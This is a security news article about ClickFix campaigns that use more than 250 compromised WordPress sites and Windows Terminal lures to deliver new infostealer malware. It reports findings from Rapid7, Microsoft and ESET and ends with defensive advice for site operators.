Cybercriminals are combining compromised websites with increasingly sophisticated ClickFix social engineering lures to deliver new infostealer malware, with one campaign alone weaponizing more than 250 WordPress sites across 12 countries.
The campaign leads to stealthy in-memory payloads, while a separate attack detected by Microsoft targets Windows Terminal for payload execution instead of the traditional Run dialog.
The WordPress campaign has been active since December 2025 and targets visitors with fake Cloudflare CAPTCHA challenges, researchers from security firm Rapid7 revealed in a report this week. The compromised WordPress websites span regional news outlets, local business websites, and even a US Senate candidate’s official webpage.
“The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort,” the researcher said.
Detection evasion
The WordPress ClickFix campaign delivers three separate infostealer payloads — two of them previously unknown — and uses domain infrastructure that appears to have been set up since July 2025.
The attackers disguise their injected JavaScript snippet as a performance optimizer that triggers only if the visitor’s browser doesn’t have a WordPress admin cookie. This technique is intended to hide the malicious behavior from website administrators.
The script fetches a fake Cloudflare CAPTCHA verification challenge from one of 14 attacker-controlled domains, all resolving to a single IP address. The fake CAPTCHA instructs visitors to copy and paste a command in the Windows Run dialog.
The rogue command consists of obfuscated JavaScript and PowerShell code that launches an in-memory shellcode loader dubbed DoubleDonut Loader. The loader injects payloads directly into legitimate Windows processes and uses reflected code loading.
“The malware chain is executed almost entirely in memory and in the context of inconspicuous Windows processes, making traditional file-based detection ineffective,” Rapid7 wrote.
The compromised sites didn’t share the same vulnerable WordPress version or plugin, suggesting that the attackers may be exploiting weak credentials or using exploits for multiple vulnerabilities.
New payloads
The DoubleDonut Loader was observed delivering a new variant of Vidar Stealer, a well-known infostealer, that uses a dead drop resolver technique to retrieve its command-and-control configuration and dynamic API resolution.
In addition to Vidar, two previously undocumented infostealers have been observed, one written in .NET and one in C++. Rapid7 has named these new programs Impure Stealer and VodkaStealer and both use detection evasion techniques, including non-standard data encoding and symmetric encryption for command-and-control communications or sandbox environment detection using system and time-based checks.
ClickFix is a growing threat
In addition to new payloads, attackers are also evolving their ClickFix lures. A separate campaign identified by Microsoft’s Threat Intelligence team replaced the common Windows Run dialog (Win+R) with the Windows Terminal app (Win+X) for command execution.
That campaign delivered the well-known Lumma Stealer and NetSupport RAT. A second payload involved a VBScript chain executed through MSBuild that used a technique known as etherhiding to download credential harvesting code.
Security firm ESET estimated that ClickFix attacks surged 517% last year, with multiple variations dubbed CrashFix, ConsentFix, and PhantomCaptcha, each with different lures and delivery mechanisms.
This basic social engineering tactic has proved so effective that even nation-state groups such as North Korea’s Lazarus group, Iran’s MuddyWater, and Russia’s APT28 have adopted it. In January, researchers from Sekoia reported that a separate ClickFix framework dubbed IClickFix had been injected into over 3,800 WordPress sites since 2024.
WordPress site operators should ensure their admin login panels are not publicly exposed, since Rapid7 noted that nearly all sites compromised in the campaign it discovered had accessible admin pages.
Rapid7 published indicators of compromise and YARA detection rules on its public GitHub repository.